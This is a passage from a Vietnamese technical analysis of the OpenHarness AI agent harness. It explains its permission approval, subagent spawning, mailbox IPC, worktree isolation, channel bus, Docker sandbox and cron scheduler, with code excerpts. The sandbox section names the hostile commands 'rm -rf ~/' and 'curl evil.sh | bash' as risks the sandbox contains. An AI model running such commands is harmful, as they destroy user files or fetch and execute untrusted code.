      tool.is_read_only)
Ưu điểm
  • Hierarchy rõ ràng — dễ audit "tại sao tool bị allow/deny"
  • Path normalization tránh bypass bằng trailing slash
  • Mỗi layer có reason riêng cho log
  • Sensitive path first — cannot be overridden
Nhược điểm
  • 6 layer phức tạp — user khó predict behavior
  • Layer 3 (allow) override layer 4 (path rule) — counter-intuitive
  • Không có conflict detection giữa allow/deny cùng pattern
  • Bash arg parsing không sophisticated như opencode tree-sitter

→ Phân tích sâu T20: 6-layer hierarchical permission evaluation + path normalization

T21. Async interactive approval với UUID + 300s timeout + lock

E.4
File: src/openharness/ui/backend_host.py · Lines: 684–706 · Timeout: 300s · Lock: _permission_lock

Code từ OpenHarness

import
      asyncio, uuid from dataclasses import dataclass @dataclass
      class PendingApproval:
      request_id: str tool_name: str tool_input: dict future:
      asyncio.Future[PermissionResolution] class BackendHost: def __init__(self): self._pending_approvals: dict[str, PendingApproval] = {}
      self._permission_lock = asyncio.Lock() async def
      request_approval(self, tool_name, tool_input, *,
      timeout=300.0): async
      with self._permission_lock: # only one approval
      at a time request_id = str(uuid.uuid4())
      fut: asyncio.Future[PermissionResolution] =
      asyncio.get_running_loop().create_future()
      self._pending_approvals[request_id] = PendingApproval(
      request_id=request_id, tool_name=tool_name, tool_input=tool_input,
      future=fut, ) # Emit event to UI with request_id; UI
      sends back resolve_approval() later await
      self._emit(ApprovalRequestEvent( request_id=request_id,
      tool_name=tool_name, tool_input=tool_input, )) try: return await
      asyncio.wait_for(fut, timeout=timeout) except
      asyncio.TimeoutError: return
      PermissionResolution(approved=False, reason="timeout") finally:
      self._pending_approvals.pop(request_id, None)
      def resolve_approval(self,
      request_id: str, approved: bool, remember: bool = False): # Called from UI when user
      clicks Allow/Deny pending = self._pending_approvals.get(request_id)
      if pending is not None and
      not pending.future.done():
      pending.future.set_result(PermissionResolution(approved=approved,
      remember=remember))
Tại sao quan trọng: UI và engine chạy async ở hai "luồng" khác nhau — cần cơ chế sync. Future là cầu nối: engine await fut, UI fut.set_result(...). UUID gán duy nhất cho mỗi approval → race an toàn khi nhiều tool call concurrent. _permission_lock đảm bảo chỉ một approval dialog show cùng lúc (UX). Timeout 300s phòng user walk away. Cleanup trong finally tránh memory leak.

Code example (generic)

import asyncio, uuid class ApprovalHost: def __init__(self): self.pending = {} self.lock =
      asyncio.Lock() async def ask(self, payload, timeout=300)
      -> bool: async with
      self.lock: rid = str(uuid.uuid4()) fut =
      asyncio.get_running_loop().create_future() self.pending[rid] = fut await self.notify_ui({"id":
      rid, "payload": payload}) try: return await
      asyncio.wait_for(fut, timeout) except
      asyncio.TimeoutError: return False finally: self.pending.pop(rid, None) def resolve(self, rid: str,
      approved: bool): if (fut
      := self.pending.get(rid)) and not fut.done():
      fut.set_result(approved)
Ưu điểm
  • Async-native — không block event loop
  • UUID tránh race giữa nhiều tool pending
  • Lock giữ UX "one dialog at a time"
  • Timeout tránh stuck session
Nhược điểm
  • Lock serialize → multiple tool call latency tăng
  • 300s timeout có thể quá ngắn khi user busy
  • Không có "remember always" semantics ở đây (layer khác)
  • Future leak nếu UI ghost không bao giờ resolve

→ Phân tích sâu T21: Async interactive approval với UUID + 300s timeout + lock

F. Multi-Agent Swarm 5 kỹ thuật · UNIQUE vs opencode

Đây là mảng OpenHarness khác biệt hoàn toàn với opencode. opencode chỉ có sub-agent Task tool chạy in-session (spawn child "khả năng" trong cùng process). OpenHarness có agent organization: mỗi agent = 1 subprocess có inbox riêng, worktree riêng, permission sync qua file. Scale từ "agent pair" (leader + worker) đến "agent team" (coordinator + N workers).

T22. Subprocess-based subagent spawning

F.1
File: src/openharness/swarm/subprocess_backend.py · Lines: 28–103 · Manager: BackgroundTaskManager · API: create_agent_task()

Code từ OpenHarness

import
      asyncio, os, sys from pathlib import Path class SubprocessAgent: def __init__(self, agent_id: str, definition:
      AgentDefinition, team_dir: Path, worktree: Path | None): self.agent_id = agent_id self.definition =
      definition self.team_dir = team_dir # shared team
      state self.worktree = worktree # git worktree for
      isolation self.proc: asyncio.subprocess.Process | None = None async def spawn(self): # Build CLI args — forward relevant flags from parent
      cmd = [ sys.executable, "-m", "openharness", "run-agent",
      "--agent-id", self.agent_id, "--team-dir", str(self.team_dir), "--model",
      self.definition.model, "--effort",
      self.definition.effort, "--permission-mode",
      self.definition.permission_mode.value, ] if
      self.definition.max_turns is not None: cmd +=
      ["--max-turns", str(self.definition.max_turns)] cwd = str(self.worktree) if
      self.worktree else None #
      Inherit env but add OPENHARNESS_SWARM_AGENT_ID env =
      os.environ.copy() env["OPENHARNESS_SWARM_AGENT_ID"] = self.agent_id env["OPENHARNESS_SWARM_TEAM_DIR"] = str(self.team_dir) self.proc = await asyncio.create_subprocess_exec( *cmd, cwd=cwd,
      env=env, stdin=asyncio.subprocess.DEVNULL, stdout=asyncio.subprocess.PIPE,
      stderr=asyncio.subprocess.PIPE, ) log.info("spawned
      subagent pid=%s id=%s", self.proc.pid, self.agent_id) class BackgroundTaskManager:
      """Registry of running subagents; support
      list/kill/wait.""" def __init__(self): self._agents: dict[str, SubprocessAgent]
      = {} async def create_agent_task(self, definition: AgentDefinition, *,
      worktree=None) -> str: agent_id = f"task-{uuid.uuid4().hex[:8]}"
      agent = SubprocessAgent(agent_id, definition, self.team_dir, worktree)
      await agent.spawn() self._agents[agent_id] = agent
      return agent_id
Tại sao quan trọng: Mỗi agent là một process độc lập → (1) fault isolation: một agent crash không lôi theo cả team; (2) parallel CPU: Python GIL không block vì multi-process; (3) permission scope: mỗi process có mode riêng, model riêng, turn limit riêng; (4) worktree isolation: có thể chạy cwd=worktree khác, sửa branch khác. Đánh đổi: overhead spawn (~500ms-1s), không share memory → cần IPC (xem T23 mailbox).

Code example (generic)

import asyncio, os, sys, uuid class SubprocessAgent: def __init__(self, agent_id,
      model, team_dir, cwd=None): self.agent_id =
      agent_id; self.model = model self.team_dir = team_dir; self.cwd = cwd
      async def spawn(self): cmd
      = [sys.executable, "-m", "myagent", "worker", "--id", self.agent_id, "--model", self.model, "--team-dir", self.team_dir] env = {**os.environ, "AGENT_ID": self.agent_id} self.proc = await asyncio.create_subprocess_exec( *cmd,
      cwd=self.cwd, env=env, stdin=asyncio.subprocess.DEVNULL,
      stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) return self.proc.pid
Ưu điểm
  • Fault isolation — 1 agent die không kéo theo team
  • Parallel CPU thực sự (không bị GIL)
  • Permission/model scope per-agent
  • Clean shutdown qua subprocess signaling
Nhược điểm
  • Spawn overhead 500ms-1s mỗi agent
  • Không share in-memory cache → I/O overhead
  • IPC qua filesystem → latency
  • Debugging khó hơn single-process (stderr tách)

T23. File-based async mailbox với atomic writes

F.2
File: src/openharness/swarm/mailbox.py · Lines: 1–95 · Layout: ~/.openharness/teams/<team>/agents/<id>/inbox/

Code từ OpenHarness

import
      json, os, uuid, time from pathlib import Path class Mailbox: """File-based inbox for a
      single agent. Layout: inbox/ <sort_key>-<uuid>.tmp ← being
      written (atomic) <sort_key>-<uuid>.json ← delivered
      (consumable) """ def __init__(self, agent_dir: Path): self.inbox = agent_dir
      / "inbox" self.inbox.mkdir(parents=True, exist_ok=True) def send(self, envelope: dict):
      """Atomic write: write .tmp then rename to
      .json.""" sort_key = f"{time.time_ns():020d}" # nanosecond
      for ordering msg_id = uuid.uuid4().hex[:8]
      base = self.inbox / f"{sort_key}-{msg_id}" tmp = base.with_suffix(".tmp") final = base.with_suffix(".json") tmp.write_text(json.dumps(envelope,
      ensure_ascii=False)) os.rename(tmp, final) # atomic on POSIX async def
      poll(self, interval=0.25): """Yield envelopes as they
      arrive. Caller deletes after consume.""" while
      True: for msg_path in sorted(self.inbox.glob("*.json")): try: envelope =
      json.loads(msg_path.read_text()) except
      json.JSONDecodeError: continue #
      partial write? skip yield envelope
      msg_path.unlink(missing_ok=True) await asyncio.sleep(interval) #
      Envelope types (message kinds) # {"kind":
      "user_message", "text": "..."} # {"kind":
      "permission_request", "request_id": "...", "tool": "...", "args":
      {...}} # {"kind": "shutdown", "reason":
      "..."} # {"kind": "tool_result", "tool": "...",
      "result": ..., "is_error": bool}
Tại sao quan trọng: Mailbox filesystem = zero-infra IPC. Atomic write (.tmp → rename) đảm bảo reader không bao giờ thấy partial file — rename là atomic trên POSIX. Sort-key nano-second đảm bảo thứ tự delivery. Poll loop đơn giản (không cần fsnotify) — latency 250ms acceptable. Envelope kind enum → message-kind routing trong consumer. Không cần Redis/RabbitMQ/Kafka → scale đến ~10 agent thoải mái.

Code example (generic)

import os, json, uuid, time, asyncio
      from pathlib import Path
      class FileMailbox: def __init__(self, inbox: Path):
      self.inbox = inbox; inbox.mkdir(parents=True,
      exist_ok=True) def send(self, msg: dict): sort_key = f"{time.time_ns():020d}" mid =
      uuid.uuid4().hex[:8] tmp = self.inbox / f"{sort_key}-{mid}.tmp" final =
      self.inbox / f"{sort_key}-{mid}.json" tmp.write_text(json.dumps(msg))
      os.rename(tmp, final) # atomic async def receive(self): while True: for p in sorted(self.inbox.glob("*.json")): msg = json.loads(p.read_text()) p.unlink()
      yield msg await
      asyncio.sleep(0.25)
Ưu điểm
  • Zero-infra (không cần message broker)
  • Atomic rename — no partial reads
  • FIFO order qua nanosecond sort key
  • Inspectable bằng filesystem tools (ls, cat)
Nhược điểm
  • Poll interval 250ms → latency floor
  • Filesystem bottleneck khi nhiều agent
  • Không persistence across machine (no remote)
  • Cần cleanup stale message nếu reader crash

T24. Dual-channel permission sync protocol

F.3
File: src/openharness/swarm/permission_sync.py · Channels: file (pending/ + resolved/) + mailbox

Code từ OpenHarness

import
      json, time from pathlib import Path class PermissionSync: """Worker writes
      pending request; Leader resolves by writing resolution.""" def __init__(self, team_dir:
      Path, agent_id: str): self.pending_dir = team_dir / "permissions" / "pending"
      self.resolved_dir = team_dir / "permissions" /
      "resolved" self.pending_dir.mkdir(parents=True, exist_ok=True)
      self.resolved_dir.mkdir(parents=True,
      exist_ok=True) self.agent_id = agent_id async def worker_request(self,
      tool: str, tool_input: dict, *, timeout=300):
      """Called by worker: write pending request; wait for
      resolution file.""" request_id = uuid.uuid4().hex # Fast-path: read-only tools auto-approved without leader
      involvement if
      _is_read_only_heuristic(tool, tool_input): return
      PermissionResolution(approved=True, reason="read-only") pending_file = self.pending_dir / f"{request_id}.json"
      resolved_file = self.resolved_dir / f"{request_id}.json"
      pending_file.write_text(json.dumps({ "request_id": request_id, "agent_id": self.agent_id, "tool": tool, "tool_input":
      tool_input, "ts": time.time(), })) # Also send notification via mailbox for low-latency
      wake-up await
      self._notify_leader_via_mailbox(request_id) # Poll for
      resolution deadline = time.time() + timeout while time.time() < deadline: if resolved_file.exists(): data =
      json.loads(resolved_file.read_text()) pending_file.unlink(missing_ok=True) resolved_file.unlink(missing_ok=True) return
      PermissionResolution(**data) await
      asyncio.sleep(0.25) return PermissionResolution(approved=False, reason="timeout") def leader_resolve(self,
      request_id: str, approved: bool, *, reason=""):
      """Called by leader (main UI) when user
      approves/denies.""" resolved_file = self.resolved_dir / f"{request_id}.json" tmp =
      resolved_file.with_suffix(".tmp")
      tmp.write_text(json.dumps({"approved": approved,
      "reason": reason})) os.rename(tmp,
      resolved_file)
Tại sao quan trọng: Worker (subprocess) cần approval từ leader (main CLI) nhưng không share memory. Dual-channel: (1) file — persistent, auditable, survive crash; (2) mailbox — low-latency wake-up signal (không cần poll sát). Read-only heuristic auto-approve → giảm tải leader. Pattern đồng bộ: worker blocks trên poll, leader non-blocking write resolution → clean separation.

Code example (generic)

import os, json, time, asyncio, uuid class PermSync: def __init__(self, pending_dir,
      resolved_dir): self.p = pending_dir; self.r = resolved_dir async def worker_wait(self,
      tool, args, timeout=300): rid = uuid.uuid4().hex
      (self.p / f"{rid}.json").write_text(json.dumps({"tool": tool, "args": args}))
      resolved = self.r / f"{rid}.json" deadline = time.time() + timeout while time.time() < deadline: if resolved.exists(): data =
      json.loads(resolved.read_text()) resolved.unlink() return data["approved"] await asyncio.sleep(0.25) return False def leader_resolve(self, rid, approved): tmp = self.r /
      f"{rid}.tmp"
      tmp.write_text(json.dumps({"approved":
      approved})) os.rename(tmp, self.r / f"{rid}.json")
Ưu điểm
  • Persistent + auditable — crash-resilient
  • Dual channel (file persist + mailbox latency)
  • Read-only heuristic giảm leader load
  • Atomic rename ở leader side
Nhược điểm
  • Poll loop 250ms floor — không real-time
  • Stale pending file nếu worker crash
  • Heuristic "read-only" có thể miss case
  • Không có request priority / queue

T25. Git worktree isolation per agent

F.4
File: src/openharness/swarm/worktree.py · Lines: 1–80 · Slug: max 64 chars, [a-zA-Z0-9._-]

Code từ OpenHarness

import
      asyncio, re from pathlib import Path SLUG_RE = re.compile(r"^[a-zA-Z0-9._-]+$")
      MAX_SLUG_LEN = 64 def
      validate_slug(slug: str) -> str: """Reject .., absolute paths, and control chars."""
      if not slug or len(slug)
      > MAX_SLUG_LEN: raise ValueError(f"slug length must be
      1..{MAX_SLUG_LEN}") if not
      SLUG_RE.match(slug): raise ValueError(f"invalid slug: {slug!r}")
      if ".." in slug or
      slug.startswith(("/", "-")): raise ValueError(f"slug must not traverse or start with
      /-: {slug!r}") return slug async def create_worktree(repo_root: Path, slug: str, *, base_ref:
      str = "HEAD") -> Path: """Create a shallow worktree for subagent isolation."""
      slug = validate_slug(slug) worktree_path = repo_root / ".openharness" / "worktrees" /
      slug branch = f"openharness/swarm/{slug}" # Reuse
      existing worktree if slug already exists if
      worktree_path.exists(): return worktree_path
      worktree_path.parent.mkdir(parents=True,
      exist_ok=True) cmd = ["git", "-C", str(repo_root), "worktree",
      "add", "--quiet", "-b", branch, str(worktree_path), base_ref] proc = await asyncio.create_subprocess_exec( *cmd,
      stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) _,
      stderr = await proc.communicate() if proc.returncode != 0: raise RuntimeError(f"git worktree add failed: {stderr.decode()}") return worktree_path async def
      remove_worktree(repo_root: Path, slug: str, *,
      force: bool = False): """Remove
      a worktree; orphan branch left as cleanup-later.""" slug =
      validate_slug(slug) worktree_path = repo_root / ".openharness" / "worktrees" /
      slug args = ["git", "-C", str(repo_root), "worktree", "remove", str(worktree_path)] if force:
      args.append("--force") ...
Tại sao quan trọng: Hai agent cùng sửa file repo → merge conflict / race condition. Worktree cho phép mỗi agent chạy trên branch riêng, checkout riêng, vẫn share .git object database (hiệu quả disk). Sau khi agent xong, merge branch về main. Slug validation ngăn path traversal (..) — quan trọng khi slug đến từ LLM input. Branch prefix openharness/swarm/ để dễ cleanup và không va chạm với dev branch.

Code example (generic)

import asyncio, re from pathlib
      import Path SLUG_RE = re.compile(r"^[a-zA-Z0-9._-]{1,64}$")
      async def make_worktree(repo: Path, slug: str, base="HEAD") -> Path: if not
      SLUG_RE.match(slug) or ".." in slug: raise ValueError("bad slug") wt
      = repo / ".worktrees" / slug if wt.exists(): return wt branch
      = f"agent/{slug}" proc =
      await asyncio.create_subprocess_exec( "git", "-C", str(repo), "worktree", "add", "-b", branch, str(wt), base, stdout=asyncio.subprocess.DEVNULL,
      stderr=asyncio.subprocess.PIPE, ) _, err = await
      proc.communicate() if proc.returncode != 0: raise
      RuntimeError(err.decode()) return wt
Ưu điểm
  • True file isolation — mỗi agent có riêng checkout
  • Share .git objects → disk efficient
  • Mỗi branch experiment độc lập
  • Slug validation tránh path traversal
Nhược điểm
  • Git worktree overhead ~100-500ms mỗi spawn
  • Cleanup thủ công khi agent crash → orphan branch
  • Không work với submodule + LFS clean
  • Disk space nhân lên khi working tree lớn

T26. YAML agent definitions + coordinator dispatch

F.5
File: src/openharness/coordinator/agent_definitions.py · Load: .openharness/agents/*.yaml

Code từ OpenHarness

import
      yaml from pathlib import
      Path from pydantic import
      BaseModel from openharness.permissions.modes import PermissionMode class
      AgentDefinition(BaseModel): name: str
      description: str system_prompt: str tools: list[str] = [] # allowlist (empty = all) disallowed_tools: list[str] =
      [] # denylist model: str = "claude-sonnet-4-6" effort: str = "medium" # low/medium/high
      permission_mode: PermissionMode = PermissionMode.DEFAULT max_turns: int |
      None = 50 color: str =
      "cyan" isolation: str = "none" # "none" | "worktree"
      def load_agent_definitions(cwd: Path) -> dict[str,
      AgentDefinition]: defs = {} for location in [ cwd / ".openharness" /
      "agents", Path.home() / ".openharness" / "agents", ]:
      if not location.is_dir(): continue for f in sorted(location.glob("*.yaml")): data = yaml.safe_load(f.read_text()) for entry in (data if isinstance(data, list) else
      [data]): defn = AgentDefinition(**entry) defs[defn.name] = defn return defs # Example agent definition
      YAML: # name: doc-writer # description: Writes technical documentation # system_prompt: | # You are a doc
      writer. Focus on clarity, accuracy, and structure. # tools: [Read, Write, Grep, Glob] #
      permission_mode: plan # cannot mutate #
      max_turns: 30 # isolation: worktree # get own
      worktree class Coordinator: """Central router:
      decide which agent handles an incoming task.""" def __init__(self, definitions:
      dict[str, AgentDefinition]): self.definitions = definitions self.manager =
      BackgroundTaskManager() async def dispatch(self, task_description: str, preferred_agent:
      str | None = None): defn =
      self.definitions.get(preferred_agent) or
      self._pick_agent(task_description) worktree = await create_worktree(...) if
      defn.isolation == "worktree" else None return await
      self.manager.create_agent_task(defn, worktree=worktree)
Tại sao quan trọng: Declarative agent definition → dễ version control, review, share. Coordinator là central dispatcher: đọc task description, chọn agent phù hợp (hoặc preferred_agent name hint), spawn với config tương ứng. isolation: worktree kích hoạt T25 (git worktree). Permission mode per-agent nghĩa một agent có thể plan (research only) trong khi agent khác full_auto (background CI worker). Rất giống pattern Claude Code subagents.

Code example (generic)

import yaml from pathlib import Path from pydantic import BaseModel
      class AgentDef(BaseModel): name: str; description: str;
      system_prompt: str tools: list[str] = [] model: str = "claude-sonnet-4-6" max_turns: int = 50 isolation: str = "none"
      def load_defs(dir: Path)
      -> dict[str, AgentDef]: out = {} for f in sorted(dir.glob("*.yaml")): d = yaml.safe_load(f.read_text()) for entry in (d if isinstance(d, list) else
      [d]): defn = AgentDef(**entry) out[defn.name] = defn return out class Coordinator: async def dispatch(self, task: str, agent_name: str): defn =
      self.defs[agent_name] wt = await
      make_worktree(repo, agent_name) if defn.isolation
      == "worktree" else None
      return await self.spawn(defn, wt,
      task)
Ưu điểm
  • Declarative — YAML git-friendly
  • Agents can be shared across team (commit to repo)
  • Per-agent tools + mode + model
  • Coordinator routing dễ extend
Nhược điểm
  • Agent selection heuristic chưa rõ — có thể pick sai
  • YAML dễ lỗi indent, không có schema warning sớm
  • Không có version/compat cho definition
  • Agent chain (A → B → C) không first-class

G. External Integrations 4 kỹ thuật · phần lớn MỚI vs opencode

Khác với opencode (CLI-only), OpenHarness mở rộng agent ra ngoài terminal: channels (Slack/Feishu/Discord/Telegram/Matrix), LSP qua Python AST, Docker sandbox cho tool execution, và cron scheduler cho background task. Biến agent thành "always-on service" thay vì "tool chạy trong editor".

T27. Multi-channel bus (Slack/Feishu/Discord/Telegram/Matrix)

G.1
File: src/openharness/channels/bus/queue.py · src/openharness/channels/impl/* · Core: MessageBus với 2 asyncio.Queue (inbound/outbound)

Code từ OpenHarness

import
      asyncio from dataclasses import dataclass @dataclass
      class ChannelMessage:
      channel: str # "slack" | "feishu" | "discord" |
      ... source_id: str # channel-specific thread /
      room user: str text: str raw: dict # adapter
      payload gốc class MessageBus: """Single agent, many
      channels. Inbound từ N channel → 1 queue, outbound từ agent → fan-out về
      đúng channel qua source_id.""" def __init__(self): self.inbound:
      asyncio.Queue[ChannelMessage] = asyncio.Queue(maxsize=1024) self.outbound:
      asyncio.Queue[tuple[str, str, str]] = asyncio.Queue() self._channels:
      dict[str, ChannelAdapter] = {} def register(self, name: str, adapter: ChannelAdapter):
      self._channels[name] = adapter async def start(self): tasks = [asyncio.create_task(c.run(self))
      for c in
      self._channels.values()]
      tasks.append(asyncio.create_task(self._outbound_dispatcher())) await asyncio.gather(*tasks, return_exceptions=True) async def _outbound_dispatcher(self): while True: channel, source_id,
      text = await self.outbound.get() adapter =
      self._channels.get(channel) if adapter: await adapter.send(source_id, text) #
      Feishu adapter — WebSocket long-connection với payload 40KB class FeishuAdapter(ChannelAdapter): MAX_PAYLOAD = 40_000
      # ~40KB per interactive card async def run(self, bus:
      MessageBus): client = lark.ws.Client(app_id=..., app_secret=...,
      event_handler=lambda evt: self._on_event(evt,
      bus)) await client.start() 
Tại sao quan trọng: Đa số harness coi agent chỉ sống trong 1 kênh (CLI, API). MessageBus pattern cho phép một agent đồng thời nhận message từ Slack DM, Feishu group, Discord channel, Telegram bot, và Matrix room — tất cả đều được normalize thành ChannelMessage. Outbound dispatcher lo chuyện format lại (ví dụ: Feishu cards, Slack Block Kit, Discord embed). Đây là cơ sở cho personal agent always-on (ohmo): user ping từ bất cứ đâu, agent respond đúng context.

Code example (generic)

import asyncio from abc import ABC,
      abstractmethod class ChannelAdapter(ABC): @abstractmethod async def
      run(self, bus): ... @abstractmethod async def
      send(self, source_id: str, text: str): ... class SlackAdapter(ChannelAdapter): def __init__(self, token):
      self.app = AsyncApp(token=token) self.app.event("message")(self._on_message) async
      def _on_message(self, event, say, bus):
      await bus.inbound.put(ChannelMessage(
      channel="slack", source_id=event["channel"], user=event["user"], text=event["text"],
      raw=event, )) async def send(self, source_id, text): await
      self.app.client.chat_postMessage(channel=source_id, text=text) # Dùng một agent cho Slack + Discord đồng thời async def main(): bus =
      MessageBus() bus.register("slack",
      SlackAdapter(token="xoxb-..."))
      bus.register("discord",
      DiscordAdapter(token="...")) async def agent_loop(): while True: msg = await bus.inbound.get() reply = await llm_reply(msg.text, user=msg.user) await bus.outbound.put((msg.channel, msg.source_id,
      reply)) await asyncio.gather(bus.start(),
      agent_loop()) 
Ưu điểm
  • Single-agent, multi-channel — DRY adapter code
  • Inbound queue có backpressure (maxsize=1024)
  • Adapter dễ swap (dev → Slack, prod → Feishu)
  • Channel ID theo (channel, source_id) giữ context thread
Nhược điểm
  • Channel-specific features (rich card, reaction, ephemeral) khó trừu tượng
  • Adapter tự xử lý rate-limit — không có central limiter
  • State per-thread chưa tách biệt (nếu không cẩn thận, user A có thể thấy reply của user B)
  • Outbound truncation (Feishu 40KB, Slack 40KB block) cần adapter lo

T28. LSP-based code intelligence qua AST

G.2
File: src/openharness/services/lsp/__init__.py · Lines: 1–100 · API: list_document_symbols, workspace_symbol_search, go_to_definition, find_references, hover

Code từ OpenHarness

import ast
      from pathlib import Path
      def list_document_symbols(file_path: Path) ->
      list[Symbol]: """Trả về top-level functions, classes,
      methods trong 1 file Python qua ast.parse() — không cần spawn language
      server ngoài.""" source = file_path.read_text(encoding="utf-8", errors="replace")
      try: tree = ast.parse(source) except SyntaxError: return []
      symbols = [] for node in
      ast.walk(tree): if isinstance(node,
      (ast.FunctionDef, ast.AsyncFunctionDef)): symbols.append(Symbol(
      name=node.name, kind="function",
      line=node.lineno, col=node.col_offset, )) elif
      isinstance(node, ast.ClassDef): symbols.append(Symbol( name=node.name,
      kind="class", line=node.lineno,
      col=node.col_offset, )) for item in node.body: if
      isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef)):
      symbols.append(Symbol( name=f"{node.name}.{item.name}", kind="method", line=item.lineno, col=item.col_offset, ))
      return symbols def workspace_symbol_search(root: Path, query: str) ->
      list[Symbol]: """Search symbol name across all *.py
      files — case-insensitive substring.""" results = [] for py_file in root.rglob("*.py"): if
      any(part.startswith(".") for part in py_file.parts):
      continue for sym in list_document_symbols(py_file): if query.lower() in
      sym.name.lower(): results.append(sym._replace(file=py_file)) return results 
Tại sao quan trọng: Thay vì spawn pyright/pylsp (heavy, cần config, khởi động chậm), OpenHarness dùng Python stdlib ast để tự parse read-only. Trade-off: không có type inference, không theo được import qua package, nhưng đủ dùng cho 80% use case của agent (tìm function, class, method signature). Agent gọi workspace_symbol_search("handle_message") thay vì grep -rn "def handle_message" — kết quả structured, có line/col chính xác.

Code example (generic)

import ast from pathlib import Path def find_function_definition(file: Path, name: str) ->
      tuple[int, int] | None:
      try: tree = ast.parse(file.read_text()) except SyntaxError: return None for node in ast.walk(tree): if
      isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)) \ and node.name == name: return
      (node.lineno, node.col_offset) return None def find_references(root: Path, name: str) -> list[tuple[Path, int]]: """Approximate:
      tìm Name/Attribute có id trùng.""" hits = [] for py in root.rglob("*.py"): try: tree =
      ast.parse(py.read_text()) except SyntaxError:
      continue for node in ast.walk(tree): if
      isinstance(node, ast.Name) and node.id == name:
      hits.append((py, node.lineno)) elif
      isinstance(node, ast.Attribute) and node.attr ==
      name: hits.append((py, node.lineno)) return hits
      
Ưu điểm
  • Zero-dep (chỉ stdlib ast) — không cần LSP server
  • Read-only, không có side effect → an toàn cho agent tool
  • Line/col chính xác, structured output
  • Parse 1 file < 10ms kể cả file lớn
Nhược điểm
  • Chỉ hiểu syntax, không có type/semantic
  • Go-to-definition qua import phải tự resolve
  • Chỉ support Python (các ngôn ngữ khác cần adapter riêng)
  • Không catch được macro/meta-class magic

T29. Docker sandbox cho tool execution

G.3
File: src/openharness/sandbox/docker_backend.py · Container: openharness-sandbox-<session_id> · Optional: --sandbox docker flag

Code từ OpenHarness

import
      docker from docker.errors import DockerException class
      DockerSandbox: """Wrap tool
      execution trong container isolated. Tool nhận được stdin/stdout qua
      container exec, không thấy host filesystem trừ volume mount có kiểm
      soát.""" def __init__(self, session_id: str, workdir: Path):
      self.name = f"openharness-sandbox-{session_id}"
      self.workdir = workdir self._client = None
      self._container = None def
      check_available(self) -> bool: """Pre-flight: Docker daemon running? Platform
      supported?""" try: self._client =
      docker.from_env(timeout=5) self._client.ping() return True except DockerException as e:
      log.warning(f"Docker not available: {e}") return False async def start(self):
      self._container = self._client.containers.run( image="openharness/sandbox:latest", name=self.name,
      detach=True, stdin_open=True, tty=True,
      network_mode="bridge", # có
      net; dùng "none" nếu muốn offline mem_limit="2g", cpu_quota=100_000, # 1
      CPU read_only=False, #
      agent cần ghi vào /workspace volumes={ str(self.workdir): {"bind": "/workspace", "mode": "rw"}, },
      working_dir="/workspace", environment={"OPENHARNESS_SANDBOX": "1"}, )
      async def exec(self, cmd:
      list[str], timeout: int = 600) -> ExecResult: if self._container is None: raise RuntimeError("sandbox not started") result =
      self._container.exec_run( cmd=cmd, stdout=True,
      stderr=True, demux=True, )
      return ExecResult(exit_code=result.exit_code,
      output=result.output) async def cleanup(self): if
      self._container: self._container.remove(force=True) 
Tại sao quan trọng: Agent chạy bash/python tool trên host luôn có rủi ro: rm -rf ~/, curl evil.sh | bash, hay exfil credentials. Docker sandbox cô lập: agent ghi vào /workspace (volume), mọi thứ ngoài đó bị container file-system cover. Kết hợp với network_mode (bridge/none), mem_limit, cpu_quota, sandbox chặn cả "agent crazy → consume all RAM" và "agent bị prompt injection → exfil". Pre-flight check_available() cho phép graceful fallback về non-sandbox nếu Docker thiếu (CI, VM nhỏ).

Code example (generic)

import docker, tempfile, subprocess
      def run_tool_in_container(cmd: list[str], workdir: str,
      timeout: int = 60): client = docker.from_env() try: container = client.containers.run( "python:3.12-slim", cmd, volumes={workdir: {"bind": "/work", "mode": "rw"}},
      working_dir="/work", mem_limit="512m", network_disabled=True,
      # no egress remove=True,
      # auto-cleanup detach=False, stdout=True, stderr=True, ) return
      container.decode("utf-8", errors="replace") except
      docker.errors.ContainerError as e: return f"[exit {e.exit_status}]:
      {e.stderr.decode()}" # Fallback if Docker
      missing def run_tool(cmd: list[str], workdir: str): if docker_available(): return
      run_tool_in_container(cmd, workdir) return
      subprocess.run(cmd, cwd=workdir, capture_output=True, text=True) 
Ưu điểm
  • Blast radius limited tới container → host an toàn
  • Resource limits (mem/cpu/network) chặn DoS
  • Reproducible env (image pin version)
  • Optional — không ép Docker nếu user không có
Nhược điểm
  • Cần Docker daemon — bỏ được một phần user (VM nhỏ, CI restricted)
  • Overhead khởi động container (~1s) cho mỗi session
  • Bind mount /workspace rw — nếu attacker escape chroot, vẫn hạ host dir
  • Image openharness/sandbox:latest phải được build & publish → supply-chain risk

T30. Cron scheduler + persistent background tasks

G.4
File: src/openharness/tasks/manager.py · src/openharness/services/cron_scheduler.py · Storage: ~/.openharness/cron/registry.json + cron_history.jsonl · Tick: 30s

Code từ OpenHarness

import
      asyncio, json from datetime import datetime from croniter
      import croniter @dataclass class CronJob: job_id: str name: str cron_expr: str # "*/30 * * * *" prompt: str # agent
      prompt khi fire enabled: bool = True
      last_run: str | None = None next_run: str | None =
      None class CronScheduler: TICK = 30 #
      seconds def __init__(self, registry_path: Path, history_path: Path):
      self.registry_path = registry_path self.history_path = history_path
      self.jobs: dict[str, CronJob] = self._load() def
      _load(self) -> dict[str, CronJob]: if not
      self.registry_path.exists(): return {} data =
      json.loads(self.registry_path.read_text()) return
      {j["job_id"]: CronJob(**j) for j in data} def _save(self):
      self.registry_path.write_text(json.dumps( [asdict(j) for j in self.jobs.values()],
      indent=2, )) async def run_forever(self, on_fire: Callable[[CronJob],
      Awaitable]): while True:
      now = datetime.utcnow() for job in list(self.jobs.values()): if
      not job.enabled: continue
      base = datetime.fromisoformat(job.last_run) if
      job.last_run else now itr =
      croniter(job.cron_expr, base) if
      itr.get_next(datetime) <= now: asyncio.create_task(self._fire(job,
      on_fire)) job.last_run = now.isoformat() self._save() await asyncio.sleep(self.TICK) async
      def _fire(self, job: CronJob, on_fire):
      try: result = await
      on_fire(job) self._append_history({"job_id":
      job.job_id, "fired_at":
      datetime.utcnow().isoformat(), "ok": True, "result_preview":
      result[:500]}) except Exception as e: self._append_history({"job_id": job.job_id, "ok":
      False, "error": str(e)})
      def _append_history(self,
      entry: dict): with self.history_path.open("a") as f:
      f.write(json.dumps(entry) + "\n") 
